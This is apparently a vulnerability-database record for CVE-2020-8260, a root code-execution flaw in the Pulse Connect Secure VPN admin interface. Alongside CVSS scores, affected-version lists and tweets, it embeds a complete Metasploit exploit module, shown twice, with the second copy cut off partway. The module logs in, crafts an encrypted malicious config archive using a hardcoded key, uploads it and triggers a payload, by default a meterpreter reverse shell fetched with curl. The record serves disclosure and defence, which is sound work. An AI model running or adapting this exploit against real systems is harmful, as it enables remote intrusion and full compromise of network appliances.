ID CVE-2020-8260 Type cve Reporter cve-assignments@hackerone.com Modified 2021-08-17T16:35:00
Description
A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.
{"id": "CVE-2020-8260", "bulletinFamily": "NVD", "title": "CVE-2020-8260", "description": "A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.", "published": "2020-10-28T13:15:00", "modified": "2021-08-17T16:35:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-8260", "reporter": "cve-assignments@hackerone.com", "references": ["https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", "http://packetstormsecurity.com/files/160619/Pulse-Secure-VPN-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-8260"], "type": "cve", "lastseen": "2021-08-19T11:27:47", "edition": 8, "viewCount": 49, "enchantments": {"dependencies": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:160619"]}, {"type": "thn", "idList": ["THN:AE2E46F59043F97BE70DB77C163186E6", "THN:9FB8DE3BF545932321335F2C525A4A36"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C"]}, {"type": "threatpost", "idList": ["THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5482AC1594C82A230828023816657B57"]}, {"type": "nessus", "idList": ["PULSE_POLICY_SECURE-SA44601.NASL", "PULSE_CONNECT_SECURE-SA44601.NASL"]}], "modified": "2021-08-19T11:27:47", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-08-19T11:27:47", "rev": 2}, "twitter": {"counter": 21, "modified": "2021-04-23T01:09:53", "tweets": [{"link": "https://twitter.com/kaito834/status/1423828058260140033", "text": "Technical Advisory\uff1a Pulse Connect Secure \u2013 RCE via Uncontrolled Archive Extraction \u2013 CVE-2021-22937 (Patch Bypass) https://t.co/Q56cEFIn62?amp=1 CVE-2021-22900\u304cCVE-2020-8260\u306b\u985e\u4f3c\u3057\u305fimport\u6a5f\u80fd\u306e\u8106\u5f31\u6027\u3067\u3042\u308b\u3053\u3068\u306b\u6c17\u3065\u304d\u3001\u30b3\u30fc\u30c9\u30ec\u30d3\u30e5\u30fc\u304b\u3089\u767a\u898b\u306b\u81f3\u3063\u305f\u3068\u306e\u3053\u3068\u30029.1R12\u3067\u4fee\u6b63\u6e08\u307f"}, {"link": "https://twitter.com/kaito834/status/1423828060055375877", "text": "Technical Advisory\uff1a Pulse Connect Secure \u2013 RCE via Uncontrolled Archive Extraction \u2013 CVE-2021-22937 (Patch Bypass) https://t.co/Q56cEFIn62?amp=1 CVE-2021-22900\u304cCVE-2020-8260\u306b\u985e\u4f3c\u3057\u305fimport\u6a5f\u80fd\u306e\u8106\u5f31\u6027\u3067\u3042\u308b\u3053\u3068\u306b\u6c17\u3065\u304d\u3001\u30b3\u30fc\u30c9\u30ec\u30d3\u30e5\u30fc\u304b\u3089\u767a\u898b\u306b\u81f3\u3063\u305f\u3068\u306e\u3053\u3068\u30029.1R12\u3067\u4fee\u6b63\u6e08\u307f"}, {"link": "https://twitter.com/ollieatnccgroup/status/1423342324583702538", "text": "Patch quality is everything... this vulnerability is a bypass of the patch for CVE-2020-8260 originally.."}, {"link": "https://twitter.com/ipssignatures/status/1425111194382344198", "text": "The vuln CVE-2020-8260 has a tweet created 0 days ago and retweeted 14 times.\n/1ZRR4H/status/1424931021427027969\n/hashtag/pow1rtrtwwcve?src=hashtag_click"}, {"link": "https://twitter.com/BleepinComputer/status/1423742884436660234", "text": "Patch bypass for Pulse Connect Secure CVE-2020-8260 vuln."}, {"link": "https://twitter.com/AusRealNews/status/1424677241653538816", "text": "RT TheHackersNews \"A new security patch update for Pulse Secure VPNs has been released to address an incomplete patch previously issued for a critical RCE /hashtag/vulnerability?src=hashtag_click (CVE-2020-8260) that was under active exploitation.\n\nRead: https://t.co/1k9UfzeIpO?amp=1\n/hashtag/infosec?src=hashtag_click /hashtag/cybersecurity?src=hashtag_click \u2026"}, {"link": "https://twitter.com/ipssignatures/status/1423359653845610501", "text": "The vuln CVE-2020-8260 has a tweet created 0 days ago and retweeted 16 times.\n/buffaloverflow/status/1423313959311056898\n/hashtag/pow1rtrtwwcve?src=hashtag_click"}, {"link": "https://twitter.com/1ZRR4H/status/1424931021427027969", "text": " ALERTA: Vulnerabilidad cr\u00edtica para VPN Pulse Secure - CVE-2021-22937 (Bypass al parche de CVE-2020-8260 RCE ).\n\nAlerta de seguridad y panorama en Latinoam\u00e9rica:\nhttps://t.co/3UMFXry5Pp?amp=1\n\ncc: /Cronup_CyberSec"}, {"link": "https://twitter.com/vulmoncom/status/1423557888186986497", "text": "Pulse Connect Secure Remote Code Execution as root via Uncontrolled Archive Extraction\n\nThis vulnerability is a bypass of the patch for CVE-2020-8260\n\nhttps://t.co/yaz22excKF?amp=1\n\nCVE-2021-22937 CVE-2020-8260 /hashtag/Vulmon?src=hashtag_click /hashtag/Ivanti?src=hashtag_click /hashtag/RCE?src=hashtag_click /hashtag/InfoSec?src=hashtag_click /hashtag/Cybersecurity?src=hashtag_click"}, {"link": "https://twitter.com/shah_sheikh/status/1423588424515080194", "text": "Patch bypass flaw in Pulse Secure VPNs can lead to total compromise (CVE-2021-22937): The patch for a vulnerability (CVE-2020-8260) in Pulse Connect Secure VPN devices that attackers have been exploiting in the wild can be bypassed, security researcher\u2026 https://t.co/czS0VQll3S?amp=1"}]}, "vulnersScore": 5.0}, "cpe": ["cpe:/a:pulsesecure:pulse_secure_desktop_client:9.1"], "affectedSoftware": [{"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "eq", "version": "9.1"}, {"cpeName": "pulsesecure:pulse_secure_desktop_client", "name": "pulsesecure pulse secure desktop client", "operator": "lt", "version": "9.1"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3.1:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:-:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r5:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.1:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:*:*:*:*:linux:*:*", "cpe_name": [], "versionEndExcluding": "9.1", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7.1:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.2:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r6:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r2:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8.2:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r1:*:*:*:linux:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:-:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r7.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8.2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r4.2:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r3.1:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r5:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r8:*:*:*:linux:*:*", "cpe:2.3:a:pulsesecure:pulse_secure_desktop_client:9.1:r6:*:*:*:linux:*:*"], "cwe": ["CWE-434"], "scheme": null, "extraReferences": [{"name": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601"}, {"name": "http://packetstormsecurity.com/files/160619/Pulse-Secure-VPN-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/160619/Pulse-Secure-VPN-Remote-Code-Execution.html"}], "immutableFields": []}
{"packetstorm": [{"lastseen": "2020-12-18T19:20:49", "description": "", "cvss3": {}, "published": "2020-12-18T00:00:00", "type": "packetstorm", "title": "Pulse Secure VPN Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-8260"], "modified": "2020-12-18T00:00:00", "id": "PACKETSTORM:160619", "href": "https://packetstormsecurity.com/files/160619/Pulse-Secure-VPN-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \nENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Pulse Secure VPN gzip RCE', \n'Description' => %q{ \nThe Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability \nwhich allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root. \nAdmin credentials are required for successful exploitation. \nOf note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`. \n}, \n'Author' => [ \n'h00die', # msf module \n'Spencer McIntyre', # msf module \n'Richard Warren <richard.warren@nccgroup.com>', # original PoC, discovery \n'David Cash <david.cash@nccgroup.com>', # original PoC, discovery \n], \n'References' => [ \n['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'], \n['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'], \n['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'], \n['CVE', '2020-8260'] \n], \n'DisclosureDate' => '2020-10-26', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix In-Memory', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' } \n} \n] \n], \n'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } }, \n'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' }, \n'DefaultTarget' => 1, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES], \n'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure'] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The URI of the application', '/']), \nOptString.new('USERNAME', [true, 'The username to login with', 'admin']), \nOptString.new('PASSWORD', [true, 'The password to login with', '123456']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]), \n]) \nend \n \ndef check(exploiting: false) \nlogin \nres = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') }) \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200 \nversion = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version \nversion, build = version \n \nreturn CheckCode::Unknown unless version.include?('R') \n \nversion, revision = version.split('R', 2) \nprint_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\") \nreturn CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9 \n \nCheckCode::Detected \nrescue Msf::Exploit::Failed \nCheckCode::Unknown \nensure \nlogout unless exploiting \nend \n \ndef exploit \ncase (checkcode = check(exploiting: true)) \nwhen Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears \nprint_good(checkcode.message) \nwhen Exploit::CheckCode::Detected \nprint_warning(checkcode.message) \nelse \nfail_with(Module::Failure::Unknown, checkcode.message.to_s) \nend \n \ncase target['Type'] \nwhen :unix_memory \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager( \nlinemax: 262144, # 256KiB \ndelay: datastore['CMDSTAGER::DELAY'] \n) \nend \n \nlogout \nend \n \ndef execute_command(command, _opts = {}) \ntrigger = Rex::Text.rand_text_alpha_upper(8) \nprint_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\") \n \nconfig = build_malicious_config(command, trigger) \nres = upload_config(config) \n \nfail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200 \n \nprint_status('Triggering RCE') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'), \n'headers' => { trigger => trigger } \n}) \nend \n \ndef res_get_xsauth(res) \nres.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first \nend \n \ndef upload_config(config) \nprint_status('Requesting backup config page') \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'), \n'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" }, \n'vars_get' => { 'type' => 'system' } \n}) \nfail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200 \nxsauth = res_get_xsauth(res) \nfail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil? \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"') \npost_data.add_part('Import', nil, nil, 'form-data; name=\"op\"') \npost_data.add_part('system', nil, nil, 'form-data; name=\"type\"') \npost_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"') \npost_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"') \npost_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"') \npost_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"') \n \nprint_status('Uploading encrypted config backup') \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'), \n'method' => 'POST', \n'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" }, \n'data' => post_data.to_s, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \nend \n \ndef login \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'tz_offset' => '-300', \n'username' => datastore['USERNAME'], \n'password' => datastore['PASSWORD'], \n'realm' => 'Admin Users', \n'btnSubmit' => 'Sign In' \n}, \n'keep_cookies' => true \n}) \n \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302 \nlocation = res.headers['Location'] \nfail_with(Failure::NoAccess, 'Login failed') if location.include?('failed') \n \nreturn unless location.include?('admin%2Dconfirm') \n \n# if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it. \nprint_status('Other admin sessions detected, continuing') \nres = send_request_cgi({ 'uri' => location, 'keep_cookies' => true }) \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200 \nfds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last \nxsauth = res_get_xsauth(res) \nfail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth \n \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'), \n'method' => 'POST', \n'vars_post' => { \n'btnContinue' => 'Continue the session', \n'FormDataStr' => fds.first, \n'xsauth' => xsauth \n}, \n'keep_cookies' => true \n}) \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res \nend \n \ndef logout \nprint_status('Logging out to prevent warnings to other admins') \nres = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') }) \nfail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200 \n \nlogout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first \nfail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil? \n \nres = send_request_cgi({ 'uri' => logout_uri }) \nfail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302 \nend \n \ndef build_malicious_config(cmd, trigger) \npayload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\" \nperl = <<~PERL \nif (length $ENV{HTTP_#{trigger}}){ \nchmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\"; \nsystem(\"env /data/var/runtime/tmp/tt/#{payload_script}\"); \n} \nPERL \ntarfile = StringIO.new \nGem::Package::TarWriter.new(tarfile) do |tar| \ntar.mkdir('tmp', 509) \ntar.mkdir('tmp/tt', 509) \ntar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio| \ntio.write perl \nend \ntar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio| \ntio.write \"PATH=/home/bin:$PATH\\n\" \ntio.write \"rm -- \\\"$0\\\"\\n\" \ntio.write cmd \nend \nend \n \ngzfile = StringIO.new \ngz = Zlib::GzipWriter.new(gzfile) \ngz.write(tarfile.string) \ngz.close \n \nencrypt_config(gzfile.string) \nend \n \ndef encrypt_config(config_blob) \ncipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt \niv = cipher.iv = cipher.random_iv \ncipher.key = ENCRYPTION_KEY \n \nmd5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\") \n \nciphertext = cipher.update(config_blob) \nciphertext << cipher.final \nmd5 << ciphertext \n \ncipher.reset \n\"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\" \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160619/pulse_secure_gzip_rce.rb.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-09-16T22:25:55", "description": "The Pulse Connect Secure appliance versions prior to 9.1R9 suffer from an uncontrolled gzip extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in remote code execution as root. Admin credentials are required for successful exploitation.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-18T00:00:00", "type": "zdt", "title": "Pulse Secure VPN Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2020-12-18T00:00:00", "id": "1337DAY-ID-35525", "href": "https://0day.today/exploit/description/35525", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n ENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Pulse Secure VPN gzip RCE',\r\n 'Description' => %q{\r\n The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability\r\n which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root.\r\n Admin credentials are required for successful exploitation.\r\n Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\r\n },\r\n 'Author' => [\r\n 'h00die', # msf module\r\n 'Spencer McIntyre', # msf module\r\n 'Richard Warren <[email\u00a0protected]>', # original PoC, discovery\r\n 'David Cash <[email\u00a0protected]>', # original PoC, discovery\r\n ],\r\n 'References' => [\r\n ['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'],\r\n ['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'],\r\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'],\r\n ['CVE', '2020-8260']\r\n ],\r\n 'DisclosureDate' => '2020-10-26',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['unix', 'linux'],\r\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\r\n 'Privileged' => true,\r\n 'Targets' => [\r\n [\r\n 'Unix In-Memory',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Type' => :unix_memory,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }\r\n }\r\n ],\r\n [\r\n 'Linux Dropper',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :linux_dropper,\r\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } },\r\n 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' },\r\n 'DefaultTarget' => 1,\r\n 'Notes' => {\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],\r\n 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure']\r\n }\r\n )\r\n )\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'The URI of the application', '/']),\r\n OptString.new('USERNAME', [true, 'The username to login with', 'admin']),\r\n OptString.new('PASSWORD', [true, 'The password to login with', '123456'])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]),\r\n ])\r\n end\r\n\r\n def check(exploiting: false)\r\n login\r\n res = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') })\r\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200\r\n version = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last\r\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version\r\n version, build = version\r\n\r\n return CheckCode::Unknown unless version.include?('R')\r\n\r\n version, revision = version.split('R', 2)\r\n print_status(\"Version #{version.strip}, revision 